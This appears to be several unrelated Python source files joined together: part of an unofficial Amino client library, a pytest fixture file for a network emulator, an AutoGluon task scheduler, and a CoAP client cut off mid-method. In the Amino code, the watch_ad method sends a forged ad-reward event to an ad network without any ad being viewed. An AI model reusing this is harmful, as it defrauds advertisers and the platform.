Like a Blog, Multiple Blogs or a Wiki.
**Parameters**
- **blogId** : ID of the Blog or List of IDs of the Blogs. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"value": 4,
"timestamp": int(timestamp() * 1000)
}
if blogId:
if isinstance(blogId, str):
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/blog/{blogId}/g-vote?cv=1.2", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif isinstance(blogId, list):
data["targetIdList"] = blogId
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/feed/g-vote", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.WrongType(type(blogId))
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/item/{wikiId}/g-vote?cv=1.2", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType()
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def unlike_blog(self, blogId: str = None, wikiId: str = None):
"""
Remove a like from a Blog or Wiki.
**Parameters**
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if blogId: response = self.session.delete(f"{self.api}/g/s/blog/{blogId}/g-vote?eventSource=UserProfileView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = self.session.delete(f"{self.api}/g/s/item/{wikiId}/g-vote?eventSource=PostDetailView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def like_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Like a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"value": 4,
"timestamp": int(timestamp() * 1000)
}
if userId:
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/user-profile/{userId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif blogId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/blog/{blogId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/item/{wikiId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def unlike_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Remove a like from a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if userId: response = self.session.delete(f"{self.api}/g/s/user-profile/{userId}/comment/{commentId}/g-vote?eventSource=UserProfileView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif blogId: response = self.session.delete(f"{self.api}/g/s/blog/{blogId}/comment/{commentId}/g-vote?eventSource=PostDetailView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = self.session.delete(f"{self.api}/g/s/item/{wikiId}/comment/{commentId}/g-vote?eventSource=PostDetailView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def get_membership_info(self):
"""
Get Information about your Amino+ Membership.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`Membership Object <amino.lib.util.objects.Membership>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/membership?force=true", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Membership(json.loads(response.text)).Membership
def get_ta_announcements(self, language: str = "en", start: int = 0, size: int = 25):
"""
Get the list of Team Amino's Announcement Blogs.
**Parameters**
- **language** : Language of the Blogs.
- ``en``, ``es``, ``pt``, ``ar``, ``ru``, ``fr``, ``de``
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Blogs List <amino.lib.util.objects.BlogList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if language not in self.get_supported_languages(): raise exceptions.UnsupportedLanguage(language)
response = self.session.get(f"{self.api}/g/s/announcement?language={language}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.BlogList(json.loads(response.text)["blogList"]).BlogList
def get_wallet_info(self):
"""
Get Information about the account's Wallet.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`Wallet Object <amino.lib.util.objects.WalletInfo>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/wallet", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.WalletInfo(json.loads(response.text)["wallet"]).WalletInfo
def get_wallet_history(self, start: int = 0, size: int = 25):
"""
Get the Wallet's History Information.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Wallet Object <amino.lib.util.objects.WalletInfo>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/wallet/coin/history?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.WalletHistory(json.loads(response.text)["coinHistoryList"]).WalletHistory
def get_from_deviceid(self, deviceId: str):
"""
Get the User ID from an Device ID.
**Parameters**
- **deviceID** : ID of the Device.
**Returns**
- **Success** : :meth:`User ID <amino.lib.util.objects.UserProfile.userId>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/auid?deviceId={deviceId}")
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["auid"]
def get_from_code(self, code: str):
"""
Get the Object Information from the Amino URL Code.
**Parameters**
- **code** : Code from the Amino URL.
- ``https://aminoapps.com/p/EXAMPLE``, the ``code`` is 'EXAMPLE'.
**Returns**
- **Success** : :meth:`From Code Object <amino.lib.util.objects.FromCode>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/link-resolution?q={code}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.FromCode(json.loads(response.text)["linkInfoV2"]).FromCode
def get_from_id(self, objectId: str, objectType: int, comId: str = None):
"""
Get the Object Information from the Object ID and Type.
**Parameters**
- **objectID** : ID of the Object. User ID, Blog ID, etc.
- **objectType** : Type of the Object.
- *comId* : ID of the Community. Use if the Object is in a Community.
**Returns**
- **Success** : :meth:`From Code Object <amino.lib.util.objects.FromCode>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"objectId": objectId,
"targetCode": 1,
"objectType": objectType,
"timestamp": int(timestamp() * 1000)
})
if comId: response = self.session.post(f"{self.api}/g/s-x{comId}/link-resolution", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: response = self.session.post(f"{self.api}/g/s/link-resolution", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.FromCode(json.loads(response.text)["linkInfoV2"]).FromCode
def get_supported_languages(self):
"""
Get the List of Supported Languages by Amino.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`List of Supported Languages <List>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/community-collection/supported-languages?start=0&size=100", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["supportedLanguages"]
def claim_new_user_coupon(self):
"""
Claim the New User Coupon available when a new account is created.
**Parameters**
- No parameters required.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.post(f"{self.api}/g/s/coupon/new-user-coupon/claim", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def get_subscriptions(self, start: int = 0, size: int = 25):
"""
Get Information about the account's Subscriptions.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`List <List>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/store/subscription?objectType=122&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["storeSubscriptionItemList"]
def get_all_users(self, start: int = 0, size: int = 25):
"""
Get list of users of Amino.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User Profile Count List Object <amino.lib.util.objects.UserProfileCountList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile?type=recent&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileCountList(json.loads(response.text)).UserProfileCountList
def accept_host(self, chatId: str, requestId: str):
data = json.dumps({})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/transfer-organizer/{requestId}/accept", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def accept_organizer(self, chatId: str, requestId: str):
self.accept_host(chatId, requestId)
# Contributed by 'https://github.com/LynxN1'
def link_identify(self, code: str):
response = self.session.get(f"{self.api}/g/s/community/link-identify?q=http%3A%2F%2Faminoapps.com%2Finvite%2F{code}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return json.loads(response.text)
def invite_to_vc(self, chatId: str, userId: str):
"""
Invite a User to a Voice Chat
**Parameters**
- **chatId** - ID of the Chat
- **userId** - ID of the User
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"uid": userId,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/vvchat-presenter/invite", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def wallet_config(self, level: int):
"""
Changes ads config
**Parameters**
- **level** - Level of the ads.
- ``1``, ``2``
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"adsLevel": level,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/wallet/ads/config", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def get_avatar_frames(self, start: int = 0, size: int = 25):
response = self.session.get(f"{self.api}/g/s/avatar-frame?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.AvatarFrameList(json.loads(response.text)["avatarFrameList"]).AvatarFrameList
def upload_bubble_preview(self, file: BinaryIO) -> str:
"""
Upload bubble preview image to the amino servers. Authorization required.
**Parameters**
- **file** - PNG image to be uploaded.
**Returns**
- **Success** : Url of the bubble preview image uploaded to the server.
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = file.read()
response = self.session.post(f"{self.api}/g/s/media/upload/target/chat-bubble-thumbnail", data=data, headers=headers.Headers(type="application/octet-stream").headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["mediaValue"]
def upload_bubble(self, config: bytes):
response = self.session.post(f"{self.api}/g/s/chat/chat-bubble/templates/107147e9-05c5-405f-8553-af65d2823457/generate", data=config, headers=headers.Headers(type="application/octet-stream").headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(response.json())
else: return response.json()["chatBubble"]["bubbleId"]
def change_bubble(self, bubbleId: str, config: bytes):
response = self.session.post(f"{self.api}/g/s/chat/chat-bubble/{bubbleId}", data=config, headers=headers.Headers(type="application/octet-stream").headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(response.json())
else: return response.json()
def create_custom_bubble(self, cover: BinaryIO, previewBackgroundUrl: BinaryIO, name: str, textColor: str = "#ffffff", linkColor: str = "#039eff", contentInsets: list = None, bubbleType: int = 1, zoomPoint: list = None, allowedSlots: list = None):
if not contentInsets: contentInsets = [26, 33, 18, 49]
if not zoomPoint: zoomPoint = [41, 44]
if not allowedSlots: allowedSlots = [{"y": -5, "x": 5, "align": 1}, {"y": 5, "x": -30, "align": 4}, {"y": 5, "x": 5, "align": 3}]
icon = self.upload_bubble_preview(previewBackgroundUrl)
cover = self.upload_bubble_preview(cover)
path = icon[len(icon) - 3:len(icon)]
config = json.dumps({
"status": 0,
"allowedSlots": allowedSlots,
"name": f"{name} (Costume) #0000000001",
"vertexInset": 0,
"contentInsets": contentInsets,
"coverImage": cover,
"bubbleType": bubbleType,
"zoomPoint": zoomPoint,
"version": 1,
"linkColor": linkColor,
"slots": None,
"previewBackgroundUrl": icon,
"id": "52a91df5-38e1-4433-b8d6-253630f1d2e8",
"color": textColor,
"backgroundPath": f"background.{path}"
})
with open("config.json", "w") as file:
file.write(config)
with open(f"background.png", "wb") as file:
file.write(self.session.get(icon).content)
zip = ZipFile("ChatBubble/bubble.zip", "w")
zip.write("config.json")
zip.write(f"background.png")
zip.close()
bubble = self.upload_bubble(open("ChatBubble/default.zip", "rb").read())
response = self.change_bubble(bubble, config=open("ChatBubble/bubble.zip", "rb").read())
if response.status_code != 200: return exceptions.CheckException(response)
else: return response.status_code
def watch_ad(self, uid: str = None):
data = headers.AdHeaders(uid if uid else self.userId).data
response = self.session.post("https://ads.tapdaq.com/v4/analytics/reward", json=data, headers=headers.AdHeaders().headers, proxies=self.proxies)
if response.status_code != 204: return exceptions.CheckException(response.status_code)
else: return response.status_code
|
conftest.py
|
"""
Unit test fixture module.
"""
import threading
import time
import mock
import pytest
from mock.mock import MagicMock
from core.api.grpc.client import InterfaceHelper
from core.api.grpc.server import CoreGrpcServer
from core.api.tlv.corehandlers import CoreHandler
from core.emane.emanemanager import EmaneManager
from core.emulator.coreemu import CoreEmu
from core.emulator.distributed import DistributedServer
from core.emulator.emudata import IpPrefixes
from core.emulator.enumerations import EventTypes
from core.emulator.session import Session
from core.nodes.base import CoreNode
from core.nodes.netclient import LinuxNetClient
EMANE_SERVICES = "zebra|OSPFv3MDR|IPForward"
class PatchManager:
def __init__(self):
self.patches = []
def patch_obj(self, _cls, attribute, return_value=None):
p = mock.patch.object(_cls, attribute, return_value=return_value)
p.start()
self.patches.append(p)
def patch(self, func):
p = mock.patch(func)
p.start()
self.patches.append(p)
def shutdown(self):
for p in self.patches:
p.stop()
class MockServer:
def __init__(self, config, coreemu):
self.config = config
self.coreemu = coreemu
@pytest.fixture(scope="session")
def patcher(request):
patch_manager = PatchManager()
patch_manager.patch_obj(DistributedServer, "remote_cmd", return_value="1")
if request.config.getoption("mock"):
patch_manager.patch("os.mkdir")
patch_manager.patch("core.utils.cmd")
patch_manager.patch("core.nodes.netclient.get_net_client")
patch_manager.patch_obj(
LinuxNetClient, "get_mac", return_value="00:00:00:00:00:00"
)
patch_manager.patch_obj(CoreNode, "nodefile")
patch_manager.patch_obj(Session, "write_state")
patch_manager.patch_obj(Session, "write_nodes")
patch_manager.patch_obj(EmaneManager, "buildxml")
yield patch_manager
patch_manager.shutdown()
@pytest.fixture(scope="session")
def global_coreemu(patcher):
coreemu = CoreEmu(config={"emane_prefix": "/usr"})
yield coreemu
coreemu.shutdown()
@pytest.fixture(scope="session")
def global_session(request, patcher, global_coreemu):
mkdir = not request.config.getoption("mock")
session = Session(1000, {"emane_prefix": "/usr"}, mkdir)
yield session
session.shutdown()
@pytest.fixture(scope="session")
def ip_prefixes():
return IpPrefixes(ip4_prefix="10.83.0.0/16")
@pytest.fixture(scope="session")
def interface_helper():
return InterfaceHelper(ip4_prefix="10.83.0.0/16")
@pytest.fixture(scope="module")
def module_grpc(global_coreemu):
grpc_server = CoreGrpcServer(global_coreemu)
thread = threading.Thread(target=grpc_server.listen, args=("localhost:50051",))
thread.daemon = True
thread.start()
time.sleep(0.1)
yield grpc_server
grpc_server.server.stop(None)
@pytest.fixture(scope="module")
def module_coretlv(patcher, global_coreemu, global_session):
request_mock = MagicMock()
request_mock.fileno = MagicMock(return_value=1)
server = MockServer({"numthreads": "1"}, global_coreemu)
request_handler = CoreHandler(request_mock, "", server)
request_handler.session = global_session
request_handler.add_session_handlers()
yield request_handler
@pytest.fixture
def grpc_server(module_grpc):
yield module_grpc
module_grpc.coreemu.shutdown()
@pytest.fixture
def session(global_session):
global_session.set_state(EventTypes.CONFIGURATION_STATE)
yield global_session
global_session.clear()
@pytest.fixture
def coretlv(module_coretlv):
session = module_coretlv.session
coreemu = module_coretlv.coreemu
coreemu.sessions[session.id] = session
yield module_coretlv
coreemu.shutdown()
def pytest_addoption(parser):
parser.addoption("--distributed", help="distributed server address")
parser.addoption("--mock", action="store_true", help="run without mocking")
def pytest_generate_tests(metafunc):
distributed_param = "distributed_address"
if distributed_param in metafunc.fixturenames:
distributed_address = metafunc.config.getoption("distributed")
metafunc.parametrize(distributed_param, [distributed_address])
|
scheduler.py
|
"""Distributed Task Scheduler"""
import os
import pickle
import logging
from warnings import warn
import multiprocessing as mp
from collections import OrderedDict
from .remote import RemoteManager
from .resource import DistributedResourceManager
from ..core import Task
from .reporter import *
from ..utils import AutoGluonWarning, AutoGluonEarlyStop, CustomProcess
logger = logging.getLogger(__name__)
__all__ = ['TaskScheduler']
class TaskScheduler(object):
"""Base Distributed Task Scheduler
"""
LOCK = mp.Lock()
RESOURCE_MANAGER = DistributedResourceManager()
REMOTE_MANAGER = RemoteManager()
def __init__(self, dist_ip_addrs=None):
if dist_ip_addrs is None:
dist_ip_addrs=[]
cls = TaskScheduler
remotes = cls.REMOTE_MANAGER.add_remote_nodes(dist_ip_addrs)
cls.RESOURCE_MANAGER.add_remote(cls.REMOTE_MANAGER.get_remotes())
self.scheduled_tasks = []
self.finished_tasks = []
def add_remote(self, ip_addrs):
"""Add remote nodes to the scheduler computation resource.
"""
ip_addrs = [ip_addrs] if isinstance(ip_addrs, str) else ip_addrs
with self.LOCK:
remotes = TaskScheduler.REMOTE_MANAGER.add_remote_nodes(ip_addrs)
TaskScheduler.RESOURCE_MANAGER.add_remote(remotes)
@classmethod
def upload_files(cls, files, **kwargs):
"""Upload files to remote machines, so that they are accessible by import or load.
"""
cls.REMOTE_MANAGER.upload_files(files, **kwargs)
def _dict_from_task(self, task):
if isinstance(task, Task):
return {'TASK_ID': task.task_id, 'Args': task.args}
else:
assert isinstance(task, dict)
return {'TASK_ID': task['TASK_ID'], 'Args': task['Args']}
def add_task(self, task, **kwargs):
"""add_task() is now deprecated in favor of add_job().
"""
warn("scheduler.add_task() is now deprecated in favor of scheduler.add_job().",
AutoGluonWarning)
self.add_job(task, **kwargs)
def add_job(self, task, **kwargs):
"""Adding a training task to the scheduler.
Args:
task (:class:`autogluon.scheduler.Task`): a new training task
Relevant entries in kwargs:
- bracket: HB bracket to be used. Has been sampled in _promote_config
- new_config: If True, task starts new config eval, otherwise it promotes
a config (only if type == 'promotion')
Only if new_config == False:
- config_key: Internal key for config
- resume_from: config promoted from this milestone
- milestone: config promoted to this milestone (next from resume_from)
"""
# adding the task
cls = TaskScheduler
if not task.resources.is_ready:
cls.RESOURCE_MANAGER._request(task.resources)
job = cls._start_distributed_job(task, cls.RESOURCE_MANAGER)
new_dict = self._dict_from_task(task)
new_dict['Job'] = job
with self.LOCK:
self.scheduled_tasks.append(new_dict)
def run_job(self, task):
"""Run a training task to the scheduler (Sync).
"""
cls = TaskScheduler
cls.RESOURCE_MANAGER._request(task.resources)
job = cls._start_distributed_job(task, cls.RESOURCE_MANAGER)
return job.result()
@staticmethod
def _start_distributed_job(task, resource_manager):
"""Async Execute the job in remote and release the resources
"""
logger.debug('\nScheduling {}'.format(task))
job = task.resources.node.submit(TaskScheduler._run_dist_job,
task.fn, task.args, task.resources.gpu_ids)
def _release_resource_callback(fut):
logger.debug('Start Releasing Resource')
resource_manager._release(task.resources)
job.add_done_callback(_release_resource_callback)
return job
@staticmethod
def _run_dist_job(fn, args, gpu_ids):
"""Remote function Executing the task
"""
if '_default_config' in args['args']:
args['args'].pop('_default_config')
if 'reporter' in args:
local_reporter = LocalStatusReporter()
dist_reporter = args['reporter']
args['reporter'] = local_reporter
manager = mp.Manager()
return_list = manager.list()
def _worker(return_list, gpu_ids, args):
"""Worker function in thec client
"""
if len(gpu_ids) > 0:
# handle GPU devices
os.environ['CUDA_VISIBLE_DEVICES'] = ",".join(map(str, gpu_ids))
os.environ['MXNET_CUDNN_AUTOTUNE_DEFAULT'] = "0"
# running
try:
ret = fn(**args)
except AutoGluonEarlyStop:
ret = None
return_list.append(ret)
try:
# start local progress
p = CustomProcess(target=_worker, args=(return_list, gpu_ids, args))
p.start()
if 'reporter' in args:
cp = Communicator.Create(p, local_reporter, dist_reporter)
p.join()
except Exception as e:
logger.error('Exception in worker process: {}'.format(e))
ret = return_list[0] if len(return_list) > 0 else None
return ret
def _clean_task_internal(self, task_dict):
pass
def _cleaning_tasks(self):
with self.LOCK:
new_scheduled_tasks = []
for task_dict in self.scheduled_tasks:
if task_dict['Job'].done():
self._clean_task_internal(task_dict)
self.finished_tasks.append(self._dict_from_task(task_dict))
else:
new_scheduled_tasks.append(task_dict)
if len(new_scheduled_tasks) < len(self.scheduled_tasks):
self.scheduled_tasks = new_scheduled_tasks
def join_tasks(self):
warn("scheduler.join_tasks() is now deprecated in favor of scheduler.join_jobs().",
AutoGluonWarning)
self.join_jobs()
def join_jobs(self, timeout=None):
"""Wait all scheduled jobs to finish
"""
self._cleaning_tasks()
for task_dict in self.scheduled_tasks:
try:
task_dict['Job'].result(timeout=timeout)
except TimeoutError as e:
logger.error(str(e))
self._clean_task_internal(task_dict)
self._cleaning_tasks()
def shutdown(self):
"""shutdown() is now deprecated in favor of :func:`autogluon.done`.
"""
warn("scheduler.shutdown() is now deprecated in favor of autogluon.done().",
AutoGluonWarning)
self.join_jobs()
self.REMOTE_MANAGER.shutdown()
def state_dict(self, destination=None):
"""Returns a dictionary containing a whole state of the Scheduler
Examples
--------
>>> ag.save(scheduler.state_dict(), 'checkpoint.ag')
"""
if destination is None:
destination = OrderedDict()
destination._metadata = OrderedDict()
destination['finished_tasks'] = pickle.dumps(self.finished_tasks)
destination['TASK_ID'] = Task.TASK_ID.value
return destination
def load_state_dict(self, state_dict):
"""Load from the saved state dict.
Examples
--------
>>> scheduler.load_state_dict(ag.load('checkpoint.ag'))
"""
self.finished_tasks = pickle.loads(state_dict['finished_tasks'])
Task.set_id(state_dict['TASK_ID'])
logger.debug('\nLoading finished_tasks: {} '.format(self.finished_tasks))
@property
def num_finished_tasks(self):
return len(self.finished_tasks)
def __repr__(self):
reprstr = self.__class__.__name__ + '(\n' + \
str(self.RESOURCE_MANAGER) +')\n'
return reprstr
|
coap.py
|
import logging
import random
import socket
import threading
import time
import collections
from coapthon import defines
from coapthon.layers.blocklayer import BlockLayer
from coapthon.layers.messagelayer import MessageLayer
from coapthon.layers.observelayer import ObserveLayer
from coapthon.layers.requestlayer import RequestLayer
from coapthon.messages.message import Message
from coapthon.messages.request import Request
from coapthon.messages.response import Response
from coapthon.serializer import Serializer
__author__ = 'Giacomo Tanganelli'
logger = logging.getLogger(__name__)
class CoAP(object):
"""
Client class to perform requests to remote servers.
"""
def __init__(self, server, starting_mid, callback, sock=None, cb_ignore_read_exception=None, cb_ignore_write_exception=None):
"""
Initialize the client.
:param server: Server address for incoming connections
:param callback:the callback function to be invoked when a response is received
:param starting_mid: used for testing purposes
:param sock: if a socket has been created externally, it can be used directly
:param cb_ignore_read_exception: Callback function to handle exception raised during the socket read operation
:param cb_ignore_write_exception: Callback function to handle exception raised during the socket write operation
"""
self._currentMID = starting_mid
self._server = server
self._callback = callback
self._cb_ignore_read_exception = cb_ignore_read_exception
self._cb_ignore_write_exception = cb_ignore_write_exception
self.stopped = threading.Event()
self.to_be_stopped = []
self._messageLayer = MessageLayer(self._currentMID)
self._blockLayer = BlockLayer()
self._observeLayer = ObserveLayer()
self._requestLayer = RequestLayer(self)
addrinfo = socket.getaddrinfo(self._server[0], None)[0]
if sock is not None:
self._socket = sock
elif addrinfo[0] == socket.AF_INET:
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
else:
self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# the below line allows for border router to multicast
self._socket.setsockopt(socket.SOL_SOCKET,25, str("wpan0" + '\0').encode('utf-8'))
self._receiver_thread = None
def purge_transactions(self, timeout_time=defines.EXCHANGE_LIFETIME):
"""
Clean old transactions
"""
self._messageLayer.purge(timeout_time)
def close(self):
"""
Stop the client.
"""
self.stopped.set()
for event in self.to_be_stopped:
event.set()
if self._receiver_thread is not None:
self._receiver_thread.join()
# self._socket.close()
@property
def current_mid(self):
"""
Return the current MID.
:return: the current mid
"""
return self._currentMID
@current_mid.setter
def current_mid(self, c):
"""
Set the current MID.
:param c: the mid to set
"""
assert isinstance(c, int)
self._currentMID = c
def send_message(self, message, no_response=False):
"""
Prepare a message to send on the UDP socket. Eventually set retransmissions.
:param message: the message to send
:param no_response: whether to await a response from the request
"""
if isinstance(message, Request):
request = self._requestLayer.send_request(message)
request = self._observeLayer.send_request(request)
request = self._blockLayer.send_request(request)
if no_response:
# don't add the send message to the message layer transactions
self.send_datagram(request)
return
transaction = self._messageLayer.send_request(request)
self.send_datagram(transaction.request)
if transaction.request.type == defines.Types["CON"]:
self._start_retransmission(transaction, transaction.request)
elif isinstance(message, Message):
message = self._observeLayer.send_empty(message)
message = self._messageLayer.send_empty(None, None, message)
self.send_datagram(message)
@staticmethod
def _wait_for_retransmit_thread(transaction):
"""
Only one retransmit thread at a time, wait for other to finish
"""
if hasattr(transaction, 'retransmit_thread'):
while transaction.retransmit_thread is not None:
logger.debug("Waiting for retransmit thread to finish ...")
time.sleep(0.01)
continue
def _send_block_request(self, transaction):
"""
A former request resulted in a block wise transfer. With this method, the block wise transfer
will be continued, including triggering of the retry mechanism.
:param transaction: The former transaction including the request which should be continued.
"""
transaction = self._messageLayer.send_request(transaction.request)
# ... but don't forget to reset the acknowledge flag
transaction.request.acknowledged = False
self.send_datagram(transaction.request)
if transaction.request.type == defines.Types["CON"]:
self._start_retransmission(transaction, transaction.request)
def send_datagram(self, message):
"""
Send a message over the UDP socket.
:param message: the message to send
"""
host, port = message.destination
logger.info("send_datagram - " + str(message))
serializer = Serializer()
raw_message = serializer.serialize(message)
try:
self._socket.sendto(raw_message, (host, port))
except Exception as e:
if self._cb_ignore_write_exception is not None and isinstance(self._cb_ignore_write_exception, collections.Callable):
if not self._cb_ignore_write_exception(e, self):
raise
# if you're explicitly setting that you don't want a response, don't wait for it
# https://tools.ietf.org/html/rfc7967#section-2.1
for opt in message.options:
if opt.number == defines.OptionRegistry.NO_RESPONSE.number:
if opt.value == 26:
return
if self._receiver_thread is None or not self._receiver_thread.isAlive():
self._receiver_thread = threading.Thread(target=self.receive_datagram)
self._receiver_thread.daemon = True
self._receiver_thread.start()
def _start_retransmission(self, transaction, message):
"""
Start the retransmission task.
:type transaction: Transaction
:param transaction: the transaction that owns the message that needs retransmission
:type message: Message
:param message: the message that needs the retransmission task
"""
with transaction:
if message.type == defines.Types['CON']:
